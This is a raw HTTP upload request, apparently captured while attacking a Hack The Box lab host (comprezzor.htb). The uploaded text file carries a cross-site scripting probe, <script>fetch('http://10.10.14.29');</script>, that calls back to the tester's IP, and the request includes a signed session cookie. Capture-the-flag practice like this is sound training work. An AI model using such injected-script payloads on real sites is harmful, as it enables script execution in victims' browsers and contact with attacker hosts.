POST / HTTP/1.1
Host: comprezzor.htb
Content-Length: 238
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://comprezzor.htb
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIxPPcQzK4B0jkY2o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://comprezzor.htb/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: user_data=eyJ1c2VyX2lkIjogNiwgInVzZXJuYW1lIjogImFzZCIsICJyb2xlIjogInVzZXIifXxhMTJmZjZlMTRkMzdjNmU1NjcwYWYzY2Q5MTVjY2ZhNWIwZTVjN2JjMTIzOTM1NTZjMWYwNzk2NDNlMWVlMzg2
Connection: close

------WebKitFormBoundaryIxPPcQzK4B0jkY2o
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plain

Hello

<script>fetch('http://10.10.14.29');</script>



------WebKitFormBoundaryIxPPcQzK4B0jkY2o--
